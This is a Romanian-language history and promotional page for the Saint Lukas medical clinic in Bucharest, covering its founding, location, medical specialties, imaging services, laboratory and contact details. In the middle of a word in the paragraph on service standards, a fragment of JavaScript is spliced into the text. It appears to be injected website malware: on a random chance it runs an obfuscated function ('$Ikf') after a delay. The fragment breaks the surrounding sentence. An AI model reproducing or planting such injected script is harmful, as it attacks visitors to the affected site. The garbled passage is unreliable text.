Istoria

POLICLINICA SAINT LUKAS

Clinica Medicală Saint Lukas a fost inaugurată pe 28 iunie 2012, din dorința de a aduce diversitate și o calitate superioară serviciilor din mediul clinicilor private din București

Localizată pe Calea Plevnei nr. 137C, o zona ușor accesibilă pentru toate mijloacele de transport în comun, inclusiv metroul, respectiv, stația ”Gara de Nord”, care se află la circa 5 minute de mers pe jos pană la clinică.

Imaginea clinicii o reprezintă echipa de medici specialiști, precum și personalul auxiliar care prin experiență, devotament și amabilitate oferă calitate actului medical și siguranța pacienților, fie că vorbim despre un simplu control de rutină sau investigații complexe.

Echipa medicală a clinicii este formată din specialişti atent selectionaţi, fiind permanent inclusă în programe de specializare, traininguri şi congrese internaţionale.

În cadrul clinicii vă punem la dispoziție servicii medicale la cele mai înalte standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andarde de calitate, precum consultații și investigații clinice, analize medicale de laborator, medicina muncii, avize medicale, fișe auto, medicină de familie.

În prezent, în Clinica Saint Lukas puteți efectua consultații medicale la diferite specialități: Alergologie, Cardiologie, Chirurgie, Dermatologie, Endocrinologie, Gastroenterologie, Ginecologie, Hematologie, Neurologie, Oftalmologie, Orl, Ortopedie, Pneumologie, Psihiatrie, Psihologie și Stomatologie, în regim decontat de Casa Națională de Asigurări de Sănătate sau cu plată.

De asemenea, în Clinica Saint Lukas se pot realiza investigații de imagistică medicală: Computer Tomograf (CT) si Osteodensitometrie (DXA).

Centrul medical Saint Lukas este recunoscut pentru laboratorul modern, ce dispune de cea mai performantă aparatură ce poate efectua investigații ce cuprind o gamă variată de analize de laborator, cu rezultate corecte și neviciate (de rutină, diagnostic avansat), din specialități precum hematologie, microbiologie, imunologie, biochimie, toxicologie, citologie & histopatologie.

Contact

+4.0727.99.96.02

office@saintlukas.ro

+4.021.367.32.05

Calea Plevnei nr. 137 C, Bucuresti, Sector 6 Bucuresti, Romania 06001

În cadrul clinicii noastre se aplică metode moderne și performante de tratament personalizat, atât pentru afecţiuni minore, cât şi pentru complicații grave, utilizând echipamente şi tehnici recunoscute la nivel internaţional.

Personalul medical și nu numai este format din persoane tinere , dinamice, cu multă iniţiativă, care posedă o experienţă vastă în domeniul medical. Cunoscând pe parcursul a mai bine de 5 ani atât cerinţele şi exigenţele pacienţilor, cât şi oferta de servicii din partea medical, putem să identificăm şi să evităm apariţia eventualelor problem, oferind pacientilor noştri o soluţie completă de tratament, la un preţ competitiv.

În speranța că v-am convins cu această scurtă, dar concisă prezentare, Clinica Saint Lukas vă așteaptă zi de zi, cu mult profesionalism, cu multă răbdare în a vă asculta doleantele sau problemele, cat și cu speranța ca veți reveni cu zambetul pe buze alături de noi!